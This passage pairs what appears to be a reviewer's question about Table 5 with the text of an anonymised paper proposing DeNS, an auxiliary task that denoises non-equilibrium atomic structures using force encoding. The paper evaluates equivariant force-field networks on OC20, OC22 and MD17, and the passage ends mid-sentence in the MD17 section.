Sullivan, Ben Sutton, Jackie Swapp, Thuyanh K. Nguyen, Xana Waughman, Joshua Wilkes, Michael Wang, Colin Farrell, Wayne Wakeman, Hongkui Zeng, John Phillips, Stefan Mihalas, Anton Arkhipov, Christof Koch, and Shawn R. Olsen. Stimulus novelty uncovers coding diversity in visual cortical circuits, February 2023. URL
X7gqOBG8ow
In Table 5, the authors demonstrate that the DeNS training is more efficient and results in larger performance gains than increasing max degrees of irreps. I wonder why the authors changed the model from EquiformerV2 to EquiformerV1 for this investigation. After all, the EquiformerV2 model is claimed to largely benefit from scaling the max degrees of irreps. How would EquiformerV2 with different max degrees of irreps behave in the same setting of Table 5?
GENERALIZING DENOISING TO NON-EQUILIBRIUM STRUCTURES IMPROVES EQUIVARIANT FORCE FIELDS Anonymous authors Paper under double-blind review ABSTRACT Understanding the interactions of atoms such as forces in 3D atomistic systems is fundamental to many applications like molecular dynamics and catalyst design. However, simulating these interactions requires compute-intensive *ab initio* calculations and thus results in limited data for training neural networks. In this paper, we propose to use denoising non-equilibrium structures (DeNS) as an auxiliary task to better leverage training data and improve performance. For training DeNS, we first corrupt a 3D structure by adding noise to its 3D coordinates and then predict the noise. Different from previous works on pre-training via denoising, which are limited to equilibrium structures, the proposed DeNS generalizes to a much larger set of non-equilibrium structures without relying on another dataset for pre-training. The key enabler is the encoding of input forces. A non-equilibrium structure has non-zero forces and thus many possible atomic positions, making denoising an ill-posed problem. To address the issue, we additionally take the forces of the original structure as inputs to specify which non-equilibrium structure we are denoising. Concretely, given a corrupted non-equilibrium structure and the forces of the original one, we predict the non-equilibrium structure satisfying the input forces instead of any arbitrary structures. Since DeNS requires encoding forces, DeNS favors equivariant networks, which can easily incorporate forces and other higher-order tensors in node embeddings. We demonstrate the effectiveness of training equivariant networks with DeNS on OC20, OC22 and MD17 datasets. For OC20, EquiformerV2 (Liao et al., 2023) trained with DeNS achieves better Structure to Energy and Forces (S2EF) results and comparable Initial Structure to Relaxed Energy (IS2RE) results. For OC22, EquiformerV2 trained with DeNS establishes new state-of-the-art results. For MD17, Equiformer ($L_{max} = 2$) (Liao & Smidt, 2023) trained with DeNS achieves better results and saves $3.1 \times$ training time compared to Equiformer ($L_{max} = 3$) without DeNS, where $L_{max}$ denotes the maximum degree. We also show that DeNS can improve other equivariant networks like eSCN (Passaro & Zitnick, 2023) on OC20 and SEGN-like networks (Brandstetter et al., 2022) on MD17. 1 INTRODUCTION Graph neural networks (GNNs) have made remarkable progress in approximating high-fidelity, compute-intensive quantum mechanical calculations like density functional theory (DFT) for atomistic systems (Gilmer et al., 2017; Zhang et al., 2018; Unke et al., 2021; Batzner et al., 2022; Rackers et al., 2023; Lan et al., 2022), enabling new insights in applications such as molecular dynamics simulations (Musaelian et al., 2023) and catalyst design (Chanussot* et al., 2021; Lan et al., 2022). However, unlike other domains such as natural language processing (NLP) and computer vision (CV), the scale of atomistic data is quite limited since generating data requires compute-intensive *ab initio* calculations. For example, the largest atomistic dataset, OC20 (Chanussot* et al., 2021), contains about 1.38M examples while GPT-3 (Brown et al., 2020) is trained on hundreds of billions of words and ViT-22B (Dehghani et al., 2023) is trained on around 4B images. To start addressing this gap, we take inspiration from self-supervised learning methods in NLP and CV and explore how we can adapt them to learn better atomistic representations from existing labeled data. Specifically, one of the most popular self-supervised learning methods in NLP (Devlin et al., 2019) and CV (He et al., 2022) is training a denoising autoencoder (Vincent et al., 2008), where the idea is to mask or corrupt a part of the input data and learn to reconstruct the original, uncorrupted data. Denoising assumes we know a unique target structure to denoise to – e.g., a sentence and an image in the case of NLP and CV. Indeed, this is the case for equilibrium structures (e.g., $S_{eq}$ at a local energy minimum in Figure 1b) as has been demonstrated by previous works leveraging denoising. Figure 1: Illustration of denoising equilibrium and non-equilibrium structures. In this figure, we relax a non-equilibrium structure (red point) and form a local relaxation trajectory (black dotted arrow). All the points along the trajectory except the blue point are non-equilibrium structures. for pretraining on atomistic data (Jiao et al., 2022; Zaidi et al., 2023; Liu et al., 2023; Wang et al., 2023; Feng et al., 2023a). However, most previous works are limited to equilibrium structures, and equilibrium structures constitute a small portion of available data since structures along a trajectory to get to a local minimum are all non-equilibrium. Hence, there is a need to generalize denoising to leverage the larger set of non-equilibrium structures. Since a non-equilibrium structure has atom-wise forces and atoms are not confined to energy local minima, it has more possible atomic positions than an equilibrium one. As shown in Figure 1a, this can make denoising an ill-posed problem since there are many possible target structures to denoise to. To address the issue, we propose to take the forces of the original non-equilibrium structure as inputs when denoising non-equilibrium structures. Intuitively, the forces constrain atomic positions of a non-equilibrium structure. With the additional information, we are able to predict the original non-equilibrium structure satisfying the input forces instead of predicting any arbitrary structures as shown in Figure 1c. Previous works on denoising equilibrium structures (Jiao et al., 2022; Zaidi et al., 2023; Liu et al., 2023; Feng et al., 2023b,a) end up being a special case where the forces of original structures are close to zeros. Based on the insight, in this paper, we propose to use denoising non-equilibrium structures (DeNS) as an auxiliary task to better leverage atomistic data. For training DeNS, we first corrupt a structure by adding noise to its 3D atomic coordinates and then reconstruct the original uncorrupted structure by predicting the noise. For noise predictions, a model is given the forces of the original uncorrupted structure as inputs to make the transformation from a corrupted non-equilibrium structure to a uncorrupted non-equilibrium structure tractable. When used along with original tasks like predicting energy and forces of non-equilibrium structures, DeNS improves the performance of the original tasks with a marginal increase in training cost. We further discuss how DeNS can leverage more from training data and the connection to self-supervised learning methods in other domains. Because DeNS requires encoding forces, it favors equivariant networks. They build up equivariant features at each node with vector spaces of irreducible representations (irreps) and have interactions or message passing between nodes with equivariant operations like tensor products. Since forces can be projected to vector spaces of irreps with spherical harmonics, equivariant networks can easily incorporate forces in node embeddings. Moreover, with the reduced complexity of equivariant operations (Passaro & Zitnick, 2023) and incorporating Transformer network design (Liao & Smidt, 2023; Liao et al., 2023) from NLP (Vaswani et al., 2017) and CV (Dosovitskiy et al., 2021), equivariant networks have become the state-of-the-art methods on large-scale atomistic datasets. We conduct extensive experiments on OC20 (Chanussot* et al., 2021), OC22 (Tran* et al., 2022) and MD17 (Chmiela et al., 2017; Schütt et al., 2017; Chmiela et al., 2018) datasets and focus on how DeNS can improve the performance of equivariant networks. EquiformerV2 trained with DeNS achieves better S2EF results and comparable IS2RE results on OC20. EquiformerV2 trained with DeNS sets new state-of-the-art results on OC22. EquiformerV1 ($L_{max} = 2$) (Liao & Smidt, 2023) trained with DeNS achieves better results on MD17 than EquiformerV1 ($L_{max} = 3$) without DeNS and saves $3.1 \times$ training time. DeNS can improve other equivariant networks like eSCN (Passaro & Zitnick, 2023) on OC20 and SEGNN-like networks (Brandstetter et al., 2022) on MD17. 2 RELATED WORKS Denoising 3D Atomistic Structures. Denoising structures have been used to boost the performance of GNNs on 3D atomistic datasets (Godwin et al., 2022; Jiao et al., 2022; Zaidi et al., 2023; Liu The approach is to first corrupt data by adding noise and then train a denoising autoencoder to reconstruct the original data by predicting the noise, and the motivation is that learning to reconstruct data enables learning generalizable representations (Devlin et al., 2019; He et al., 2022; Godwin et al., 2022; Zaidi et al., 2023). Since denoising equilibrium structures do not require labels and is self-supervised, similar to BERT (Devlin et al., 2019) and MAE (He et al., 2022), it is common to pre-train via denoising on a large dataset of equilibrium structures like PCQM4Mv2 (Nakata & Shimazaki, 2017) and then fine-tune with supervised learning on smaller downstream datasets. Besides, Noisy Nodes (Godwin et al., 2022) use denoising equilibrium structures as an auxiliary task along with original tasks without pre-training on another larger dataset. However, most of the previous works are limited to equilibrium structures, which occupy a much smaller amount of data than non-equilibrium ones. In contrast, the proposed DeNS generalizes denoising to non-equilibrium structures with force encoding so that we can improve the performance on the larger set of non-equilibrium structures. We provide a detailed comparison to previous works on denoising in Section A.2. **SE(3)/E(3)-Equivariant Networks.** Refer to Section A.1 for discussion on equivariant networks. ### 3 Method #### 3.1 Problem Setup Calculating quantum mechanical properties like energy and forces of 3D atomistic systems is fundamental to many applications. An atomistic system can be one or more molecules, a crystalline material and so on. Specifically, each system $S$ is an example in a dataset and can be described as $S = \{(z_i, p_i) | i \in \{1, ..., |S|\}\}$, where $z_i \in \mathbb{N}$ denotes the atomic number of the $i$-th atom and $p_i \in \mathbb{R}^3$ denotes the 3D atomic position. The energy of $S$ is denoted as $E(S) \in \mathbb{R}$, and the atom-wise forces are denoted as $F(S) = \{f_i \in \mathbb{R}^3 | i \in \{1, ..., |S|\}\}$, where $f_i$ is the force acting on the $i$-th atom. In this paper, we define a system to be an equilibrium structure if all of its atom-wise forces are close to zeros. Otherwise, we refer to it as a non-equilibrium structure. Since non-equilibrium structures have non-zero atomic forces and thus are not at an energy minimum, they have more degrees of freedom and constitute a much larger set of possible structures than those at equilibrium. In this work, we focus on the task of predicting energy and forces given non-equilibrium structures. Specifically, given a non-equilibrium structure $S_{\text{non-eq}}$, GNNs predict energy $\hat{E}(S_{\text{non-eq}})$ and atom-wise forces $\hat{F}(S_{\text{non-eq}}) = \{\hat{f}_i(S_{\text{non-eq}}) \in \mathbb{R}^3 | i \in \{1, ..., |S_{\text{non-eq}}|\}\}$ and minimize the loss function: $$\lambda_E \cdot L_E + \lambda_F \cdot L_F = \lambda_E \cdot |E'(S_{\text{non-eq}}) - \hat{E}(S_{\text{non-eq}})| + \lambda_F \cdot \frac{1}{|S_{\text{non-eq}}|} \sum_{i=1}^{|S_{\text{non-eq}}|} |\hat{f}_i(S_{\text{non-eq}}) - \hat{f}_i(S_{\text{non-eq}})|^2$$ $\lambda_E$ and $\lambda_F$ are energy and force coefficients controlling the relative importance between energy and force predictions. $E'(S_{\text{non-eq}}) = \frac{E(S_{\text{non-eq}}) - \mu_E}{\sigma_E}$ is the normalized ground truth energy obtained by first subtracting the original energy $E(S_{\text{non-eq}})$ by the mean of energy labels in the training set $\mu_E$ and then dividing by the standard deviation of energy labels $\sigma_E$. Similarly, $f'_i = \frac{f_i}{\sigma_F}$ is the normalized atom-wise force. For force predictions, we can either directly predict them from latent representations like node embeddings as commonly used for OC20 and OC22 datasets or take the negative gradients of predicted energy with respect to atomic positions for datasets like MD17. #### 3.2 Denoising Non-Equilibrium Structures (DeNS) ##### 3.2.1 Formulation of Denoising Denoising structures have been used to improve the performance of GNNs on 3D atomistic datasets. They first corrupt data by adding noise and then train a denoising autoencoder to reconstruct the original data by predicting the noise. Specifically, given a 3D atomistic system $S = \{(z_i, p_i) | i \in \{1, ..., |S|\}\}$, we create a corrupted structure $\tilde{S}$ by adding Gaussian noise with a tuneable standard deviation $\sigma$ to the atomic positions $p_i$ of the original structure $S$: $$\tilde{S} = \{(z_i, \tilde{p}_i) | i \in \{1, ..., |S|\}\}, \quad \text{where} \quad \tilde{p}_i = p_i + \epsilon_i \quad \text{and} \quad \epsilon_i \sim \mathcal{N}(0, \sigma I_3)$$ We denote the set of noise added to $S$ as $\text{Noise}(S, \tilde{S}) = \{\epsilon_i \in \mathbb{R}^3 | i \in \{1, ..., |S|\}\}$. When training a denoising autoencoder, GNNs take $\tilde{S}$ as inputs, output atom-wise noise predictions $\hat{\epsilon}(\tilde{S})$, and minimize the L2 difference between normalized noise $\frac{\epsilon_i}{\sigma}$ and noise predictions $\hat{\epsilon}(\tilde{S})_i$: \[ \mathbb{E}_{p(S, \tilde{S})} \left[ \frac{1}{|S|} \sum_{i=1}^{|S|} \left| \frac{\epsilon_i}{\sigma} - \hat{\epsilon}(\tilde{S})_i \right|^2 \right] \tag{3} \] \( p(S, \tilde{S}) \) denotes the probability of obtaining the corrupted structure \( \tilde{S} \) from the original structure \( S \). We divide the noise \( \epsilon_i \) by the standard deviation \( \sigma \) to normalize the outputs of noise predictions. When the original structure \( S \) is an equilibrium structure, denoising is to find the structure corresponding to the nearest energy local minima given a high-energy corrupted structure. This makes denoising equilibrium structures a many-to-one mapping and a well-defined problem. However, when the original structure \( S \) is a non-equilibrium structure, denoising, the transformation from a corrupted non-equilibrium structure to the original non-equilibrium one, can be an ill-posed problem since there are many possible target structures to denoise to as shown in Figure 1a. ### 3.2.2 Force Encoding The reason that denoising non-equilibrium structures can be ill-posed is because we do not provide sufficient information to specify the properties of the target structures. Concretely, given an original non-equilibrium structure \( S_{\text{non-eq}} \) and its corrupted counterpart \( \tilde{S}_{\text{non-eq}} \), some structures interpolated between \( S_{\text{non-eq}} \) and \( \tilde{S}_{\text{non-eq}} \) could be in the same data distribution and therefore be the potential target structures of denoising. In contrast, when denoising equilibrium structures as shown in Figure 1b, we implicitly provide the extra information that the target structure should be at equilibrium with near-zero forces, and this therefore limits the possibility of the target of denoising. Motivated by the assumption that the forces of the original structures are close to zeros when denoising equilibrium ones, we propose to encode the forces of original non-equilibrium structures when denoising non-equilibrium ones as illustrated in Figure 1c. Specifically, when training denoising non-equilibrium structures (DeNS), GNNs take both a corrupted non-equilibrium structure \( \tilde{S}_{\text{non-eq}} \) and the forces \( F(\tilde{S}_{\text{non-eq}}) \) of the original non-equilibrium structure \( S_{\text{non-eq}} \) as inputs, output atom-wise noise predictions \( \hat{\epsilon} \left( \tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}}) \right)_i \) and minimize the L2 difference between normalized noise \( \frac{\epsilon_i}{\sigma} \) and noise predictions \( \hat{\epsilon} \left( \tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}}) \right)_i \): \[ \mathcal{L}_{\text{DeNS}} = \mathbb{E}_{p(S_{\text{non-eq}}, \tilde{S}_{\text{non-eq}})} \left[ \frac{1}{|S_{\text{non-eq}}|} \sum_{i=1}^{|S_{\text{non-eq}}|} \left| \frac{\epsilon_i}{\sigma} - \hat{\epsilon} \left( \tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}}) \right)_i \right|^2 \right] \tag{4} \] Equation 4 is more general and reduces to Equation 3 when the target of denoising becomes equilibrium structures. Since we train GNNs with \( \tilde{S}_{\text{non-eq}} \) and \( F(S_{\text{non-eq}}) \) as inputs and Noise\( (S_{\text{non-eq}}, \tilde{S}_{\text{non-eq}}) \) as outputs, they implicitly learn to leverage \( F(S_{\text{non-eq}}) \) to reconstruct \( S_{\text{non-eq}} \) instead of predicting any arbitrary non-equilibrium structures. Comparing Index 1 and Index 2 in Table 1e, force encoding enables DeNS to significantly improve the performance. Since DeNS requires encoding of forces, DeNS favors equivariant networks, which can easily incorporate forces as well as other higher-degree tensors into their node embeddings. Specifically, the node embeddings of equivariant networks are equivariant irreps features built from vectors spaces of irreducible representations (irreps) and contain \( C_L \) channels of type-\( L \) vectors with degree \( L \) being in the range from 0 to maximum degree \( L_{\text{max}} \). \( C_L \) and \( L_{\text{max}} \) are architectural hyper-parameters of equivariant networks. To obtain the force embedding \( x_f^{(L)} \) from the input force \( f \), we first project \( f \) into type-\( L \) vectors, with \( 0 \leq L \leq L_{\text{max}} \), with spherical harmonics \( Y^{(L)} \left( \frac{f}{||f||} \right) \) and then expand the number of channels from 1 to \( C_L \) with an \( SO(3) \) linear layer (Geiger et al., 2022; Geiger & Smidt, 2022): \[ x_f^{(L)} = \text{SO3\_Linear}^{(L)} \left( ||f|| \cdot Y^{(L)} \left( \frac{f}{||f||} \right) \right) \tag{5} \] \( x_f^{(L)} \) denotes the channels of type-\( L \) vectors in force embedding \( x_f \), and \( \text{SO3\_Linear}^{(L)} \) denotes the \( SO(3) \) linear operation on type-\( L \) vectors. Since we normalize the input force when using spherical harmonics, we multiply \( Y^{(L)} \left( \frac{f}{||f||} \right) \) with the norm of input force \( ||f|| \) to recover the information of force magnitude. After computing force embeddings for all atom-wise forces, we add the force embeddings to initial node embeddings to encode forces in equivariant networks. On the other hand, it might not be that intuitive to encode forces in invariant networks since their internal latent representations such as node embeddings and edge embeddings are scalars not geometric tensors. One potential manner of encoding forces in latent representations is to project them Figure 2: Training process when incorporating DeNS as an auxiliary task. The upper blue block corresponds to the original task of energy and force predictions (Equation 1), and the lower red block corresponds to training DeNS (Equation 6). “Equivariant GNN” and “energy head” are shared across the two tasks. For each batch of structures, we use the original task for some structures and DeNS for the others. into edge embeddings by taking inner products between forces and edge vectors of relative positions. This process is the inverse of how GemNet-OC (Gasteiger et al., 2022) decodes forces from latent representations. Since equivariant networks have been shown to outperform invariant networks on datasets containing non-equilibrium structures and are simpler to encode forces, in this work, we mainly focus on equivariant networks and how DeNS can further advance their performance. 3.2.3 Training DeNS Auxiliary Task. We propose to train DeNS as an auxiliary task along with the original task of predicting energy and forces to improve the performance of energy and force predictions and summarize the training process in Figure 2. Specifically, given a batch of structures, for each structure, we decide whether we optimize the objective of DeNS (Equation 6) or the objective of the original task (Equation 1). This introduces an additional hyper-parameter $p_{\text{DeNS}}$, the probability of optimizing DeNS. We use an additional noise head for noise predictions, which slightly increases training time. Additionally, when training DeNS, similar to Noisy Nodes (Godwin et al., 2022), we also leverage energy labels and predict the energy of original structures. Therefore, given an original non-equilibrium structure $S_{\text{non-eq}}$ and the corrupted counterpart $\tilde{S}_{\text{non-eq}}$, training DeNS corresponds to minimizing the following loss function: $$ \lambda_E \cdot L_E + \lambda_{\text{DeNS}} \cdot L_{\text{DeNS}} = \lambda_E \cdot \left| E'(S_{\text{non-eq}}) - \hat{E}(\tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}})) \right| + \lambda_{\text{DeNS}} \cdot L_{\text{DeNS}} $$ (6) where $L_{\text{DeNS}}$ denotes the loss function of denoising as defined in Equation 4. We note that we also encode forces as discussed in Section 3.2.2 to predict the energy of $S_{\text{non-eq}}$, and we share the energy prediction head across Equation 1 and Equation 6. The loss function introduces another hyper-parameter $\lambda_{\text{DeNS}}$, DeNS coefficient, controlling the importance of the auxiliary task. Besides, the process of corrupting structures also results in another hyper-parameter $\sigma$ as shown in Equation 2. We provide the pseudocode in Section E. We note that we only train DeNS with force encoding on the training set without using any force labels on the validation and testing sets. Multi-Scale Noise. Inspired by prior works on denoising score matching (Song & Ermon, 2019; 2020), we empirically find that incorporating multiple noise scales together for denoising improves energy and force predictions on OC20 and OC22 datasets. Specifically, we choose the standard deviations $\{\sigma_k\}_{k=1}^T$ to be a geometric progression that satisfy $\frac{\sigma_T}{\sigma_{T-1}} = \ldots = \frac{\sigma_2}{\sigma_1} = \frac{\sigma_1}{\sigma_0} > 1$: $$ \sigma_k = \exp \left( \log_e \sigma_{\text{low}} + \frac{k-1}{T-1} \cdot (\log_e \sigma_{\text{high}} - \log_e \sigma_{\text{low}}) \right) \quad \text{where} \quad k = 1, \ldots, T $$ (7) Here we use $\sigma_1 = \sigma_{\text{low}} = 0.01$ and $T = 50$ and only tune $\sigma_T = \sigma_{\text{high}}$ when multi-scale noise is adopted. When training with DeNS, for each structure, we first sample a single noise standard deviation $\sigma$ from the $T$ values, and then follow Equations 2 and 4. We surmise that multi-scale noises are more likely to span the distribution of meaningful non-equilibrium structures across a diverse range of atom types and geometries compared to a fixed $\sigma$. 3.2.4 Discussion How DeNS Can Improve Performance. DeNS enables leveraging more from training data to improve the performance in the following two manners. First, DeNS adds noise to non-equilibrium structures to generate structures with new geometries and therefore naturally achieves data augmentation (Godwin et al., 2022). Second, training DeNS encourages learning a different yet highly correlated interaction. Since we encode forces as inputs and predict the original structures in terms of noise corrections, DeNS enables learning the interaction of transforming forces into structures, which is the inverse of force predictions. As demonstrated in the works of Noisy Nodes (Godwin et al., 2022) and UL2 (Tay et al., 2023), training a single model with multiple correlated objectives to learn different interactions can help the performance on the original task. Connection to Self-Supervised Learning. DeNS shares similar intuitions to self-supervised learning methods like BERT (Devlin et al., 2019) and MAE (He et al., 2022) and other denoising methods (Vincent et al., 2008; 2010; Godwin et al., 2022; Zaidi et al., 2023) – they remove or corrupt a portion of input data and then learn to predict the original data. Learning to reconstruct data can help learning generalizable representations, and therefore these methods can use the task of reconstruction to improve the performance of downstream tasks. However, since DeNS requires force labels for encoding, DeNS does not belong to self-supervised learning strictly but instead provides another way to learn more from data. Therefore, we propose to use DeNS as an auxiliary task optimized along with original tasks and do not follow the previous practice of first pre-training and then fine-tuning. Additionally, we note that before obtaining a single equilibrium structure, we need to run relaxations and generate many intermediate non-equilibrium ones, which is the labeling process as well. We hope that the ability to leverage more from non-equilibrium structures as proposed in this work can encourage researchers to release data containing intermediate non-equilibrium structures in addition to final equilibrium ones. Moreover, we note that DeNS can be used in fine-tuning. For example, we can first pre-train models on PCQM4Mv2 dataset and then fine-tune them on the smaller MD17 dataset with both the original task and DeNS. Marginal Increase in Training Time. Since we use an additional noise head for denoising, training with DeNS marginally increases the time of each training iteration. We optimize DeNS for some structures and the original task for the others for each training iteration, and we demonstrate that DeNS can improve the performance given the same amount of training iterations. Therefore, training with DeNS only marginally increase the overall training time. 4 EXPERIMENTS 4.1 OC20 Dataset Dataset and Tasks. We start with experiments on the large and diverse Open Catalyst 2020 dataset (OC20) (Chanussot* et al., 2021), which consists of about 1.2M Density Functional Theory (DFT) relaxation trajectories. Each DFT trajectory in OC20 starts from an initial structure of an adsorbate molecule placed on a catalyst surface, which is then relaxed with the revised Perdew-Burke-Ernzerhof (RPBE) functional (Hammer et al., 1999) calculations to a local energy minimum. Relevant to DeNS, all the intermediate structures from these trajectories, except the relaxed structure, are considered non-equilibrium structures. The relaxed or equilibrium structure has forces close to zero. The primary task in OC20 is Structure to Energy and Forces (S2EF), which is to predict the energy and per-atom forces given an equilibrium or non-equilibrium structure from any point in the trajectory. These predictions are evaluated on energy and force mean absolute error (MAE). Once a model is trained for S2EF, it is used to run structural relaxations from an initial structure using the predicted forces till a local energy minimum is found. The energy predictions of these relaxed structures are evaluated on the Initial Structure to Relaxed Energy (IS2RE) task. Training Details. Please refer to Section B.1 for details on DeNS, architectures, hyper-parameters and training time. 4.1.1 Ablation Studies We use EquiformerV2 (Liao et al., 2023) and S2EF-2M split of OC20 to investigate how DeNS-related hyper-parameters affect the performance, compare the results of training with and without DeNS and verify some design choices of DeNS. Hyperparameters. In Tables 1a, 1b, 1c, we vary $\sigma_{\text{high}}$, the upper bound on standard deviations of Gaussian noise, $p_{\text{DeNS}}$, the probability of optimizing DeNS, and $\lambda_{\text{DeNS}}$, the loss coefficient for DeNS, to study how the hyper-parameters of DeNS affect performance. We find that the optimal settings are similar when training for different epochs and have the following observations. First, as we increase $\sigma_{\text{high}}$, force predictions become worse monotonically, while energy predictions improve but saturate at $\sigma_{\text{high}} = 0.5$. Second, $p_{\text{DeNS}} = 0.5$ and $\lambda_{\text{DeNS}} = 10$ and 15 work better than any other values across the three different epochs. ### Comparison of Training with and without DeNS Table 1d summarizes the results of training with and without DeNS. For EquiformerV2, incorporating DeNS as an auxiliary task boosts the performance of energy and force predictions, and only increases training time by 7.4% and the number of parameters from 83M to 89M. Particularly, EquiformerV2 trained with DeNS for 12 epochs outperforms EquiformerV2 trained without DeNS for 30 epochs, saving $2.3 \times$ training time. Additionally, we also show that DeNS can be applicable to other equivariant networks like eSCN, and training eSCN with DeNS improves both energy and force MAE while slightly increasing training time by 1.5%. The different amount of increase in training time between EquiformerV2 and eSCN is because they use different modules for noise predictions. ### Design Choices We conduct experiments to verify the design choices of DeNS and summarize the results in Table 1e. All the models follow the best setting of training with DeNS for 12 epochs in Table 1b. Comparing Index 1 and Index 2, we show that encoding forces $F(S_{\text{non-eq}})$ in Equations 4 and 6 enables denoising non-equilibrium structures to further improve performance. DeNS without force encoding only results in slightly better force MAE than training without DeNS as in Table 1d. We also compare DeNS with and without force encoding on the MD17 dataset in Section D.3 and find that force encoding is critical. Comparing Index 1 and Index 3, we demonstrate that predicting energy of original structures given corrupted ones can be helpful to the original task. Additionally, we compare the performance of using a fixed $\sigma$ and multi-scale noise, and the comparison between Index 1 and Index 4 shows that multi-scale noise improves both energy and force predictions. Since we sample standard deviation $\sigma$ when using multi-scale noise, we also investigate whether we need to encode $\sigma$. The comparison between Index 1 and Index 5 shows that DeNS without $\sigma$ encoding works better, and thus we can use the same approach when we use either a fixed $\sigma$ or multi-scale noise. #### 4.1.2 Main Results **All + MD.** We train EquiformerV2 (160M) with DeNS on the S2EF-All+MD split of OC20. The model follows the same configuration as EquiformerV2 (153M) trained without DeNS, and the additional parameters are due to force encoding and one additional equivariant graph attention for noise predictions. We report results in Table 2. All test results are computed via the EvalAI evaluation server\(^1\). EquiformerV2 trained with DeNS achieves better S2EF results and comparable IS2RE results, setting the new state-of-the-art results. The improvement is not as significant as that on OC20 S2EF-2M and MD17 (Section 4.3) datasets since the OC20 S2EF-All+MD training set contains much more structures along relaxation trajectories, making new 3D geometries generated by DeNS less helpful. However, DeNS is valuable because most datasets are not as large as OC20 S2EF-All+MD dataset but have sizes closer to OC20 S2EF-2M and MD17 datasets. ### 4.2 OC22 Dataset **Dataset and Tasks.** The Open Catalyst 2022 (OC22) dataset (Tran* et al., 2022) focuses on oxide electrocatalysis and consists of about 62k DFT relaxations obtained with Perdew-Burke-Ernzerhof (PBE) functional calculations. One crucial difference in OC22, compared to OC20, is that the energy targets in OC22 are DFT total energies. DFT total energies are harder to predict but are the most general and closest to a DFT surrogate, offering the flexibility to study property prediction beyond adsorption energies. Analogous to the task definitions in OC20, the primary tasks in OC22 are S2EF-Total and IS2RE-Total. We train models on the OC22 S2EF-Total dataset, which has 8.2M structures, and evaluate them on energy and force MAE on the S2EF-total validation and test splits. After that, we use these models to perform structure relaxations starting from initial structures in the IS2RE-Total test split and evaluate the predicted relaxed energies on energy MAE. **Training Details.** Please refer to Section C.1 for details on architectures, hyper-parameters and training time. **Results.** First, we conduct ablation studies to investigate the effects of DeNS-related hyper-parameters in Section C.2. Second, we use the best hyper-parameter setting in Section C.2 to train EquiformerV2 of 18 blocks with DeNS and report the results in Table 3. Compared to EquiformerV2 trained with different energy and force coefficients but without DeNS, EquiformerV2 trained with DeNS improves the trade-offs between energy and force MAE, achieving comparable energy MAE to EquiformerV2 (\(\lambda_E = 1, \lambda_F = 1\)) trained without DeNS and overall better force MAE than EquiformerV2 (\(\lambda_E = 4, \lambda_F = 100\)) trained without DeNS. For IS2RE-Total, EquiformerV2 trained with DeNS achieves the best energy MAE results. The improvement on IS2RE-Total from training with DeNS on only OC22 is comparable to that of training on the much larger OC20 and OC22 datasets in previous works. Specifically, training GemNet-OC on OC20 and OC22 datasets (about 138M + 8.4M structures) improves IS2RE-Total energy MAE ID by 129meV and OOD by 50meV compared to training GemNet-OC on only OC22 dataset (8.4M structures). Compared to training without DeNS, training EquiformerV2 with DeNS improves ID by 90meV and OOD by 48meV. Thus, training with DeNS clearly improves sample efficiency and performance on OC22. --- \(^1\)eval.ai/web/challenges/challenge-page/712 Table 4: Mean absolute error results on the MD17 testing set. Energy and force are in units of meV and meV/Å. We additionally report the time of training different Equiformer models averaged over all molecules and the numbers of parameters to show that the proposed DeNS can improve performance with minimal overhead. | Method | Aspirin | Benzene | Ethanol | Malonaldehyde | Naphthalene | Salicylic acid | Toluene | Uracil | |--------|---------|---------|---------|--------------|-------------|----------------|---------|-------| | Index | Attention | Layer normalization | DeNS | energy | forces | energy | forces | energy | forces | energy | forces | energy | forces | energy | forces | energy | forces | | 1 | ✓ | ✓ | ✓ | 5.3 | 7.2 | 2.2 | 6.6 | 2.2 | 3.1 | 3.8 | 5.8 | 3.7 | 2.1 | 4.5 | 4.1 | 3.8 | 2.1 | 4.3 | 3.3 | | 2 | ✓ | ✓ | ✓ | 5.1 | 5.7 | 2.3 | 6.1 | 2.2 | 2.6 | 3.2 | 4.4 | 3.7 | 1.7 | 4.3 | 3.9 | 3.5 | 1.9 | 4.2 | 3.3 | | 3 | ✓ | ✓ | ✓ | 5.2 | 7.7 | 2.4 | 6.2 | 2.3 | 3.9 | 3.3 | 6.2 | 3.8 | 2.2 | 4.1 | 4.7 | 3.3 | 2.4 | 4.2 | 4.4 | | 4 | ✓ | ✓ | ✓ | 5.2 | 6.1 | 2.4 | 6.1 | 2.2 | 2.9 | 3.2 | 5.1 | 3.7 | 1.7 | 4.2 | 3.9 | 3.4 | 2.0 | 4.2 | 3.4 | | 5 | ✓ | ✓ | ✓ | 5.3 | 9.3 | 2.4 | 9.2 | 2.3 | 4.5 | 3.4 | 8.2 | 3.7 | 2.4 | 4.2 | 5.5 | 3.3 | 2.9 | 4.2 | 4.8 | | 6 | ✓ | ✓ | ✓ | 5.2 | 7.3 | 2.4 | 8.1 | 2.2 | 3.4 | 3.4 | 6.7 | 3.7 | 1.9 | 4.2 | 4.4 | 3.4 | 2.2 | 4.2 | 3.8 | Table 5: Mean absolute error results of variants of Equiformer ($L_{max} = 2$) without attention and layer normalization on the MD17 testing set. Energy and force are in units of meV and meV/Å. Index 1 and Index 2 correspond to “Equiformer ($L_{max} = 2$)” and “Equiformer ($L_{max} = 2$) + DeNS” in Table 4. ### 4.3 MD17 Dataset **Dataset.** The MD17 dataset (Chmiela et al., 2017; Schütt et al., 2017; Chmiela et al., 2018) consists of molecular dynamics simulations of small organic molecules. The task is to predict the energy and forces of these non-equilibrium molecules. We use 950 and 50 different configurations for training and validation sets and the rest for the testing set. **Training Details.** Please refer to Section D.2 for additional implementation details of DeNS, hyper-parameters and training time. **Results.** We train Equiformer ($L_{max} = 2$) (Liao & Smidt, 2023) with DeNS based on their implementation and summarize the results in Table 4. DeNS improves the results on all molecules, and Equiformer ($L_{max} = 2$) trained with DeNS achieves overall best results. Particularly, Equiformer ($L_{max} = 2$) trained with DeNS achieves better results on all the tasks and requires $3.1 \times$ less training time than Equiformer ($L_{max} = 3$) trained without DeNS. This demonstrates that for this small dataset, training an auxiliary task and using data augmentation are more efficient and result in larger performance gain than increasing $L_{max}$ from 2 to 3. Besides, training with DeNS marginally increase the training time and the number of parameters since we have one additional equivariant graph attention for noise predictions. Additionally, we find that the gains from training DeNS as an auxiliary task are comparable to pre-training. Zaidi et al. (2023) uses TorchMD-NET (Thölke & Fabritii, 2022) pre-trained on the PCQM4Mv2 dataset and report results on Aspirin. Their improvement on force MAE is about 17.2% (Table 3 in Zaidi et al. (2023)). Training 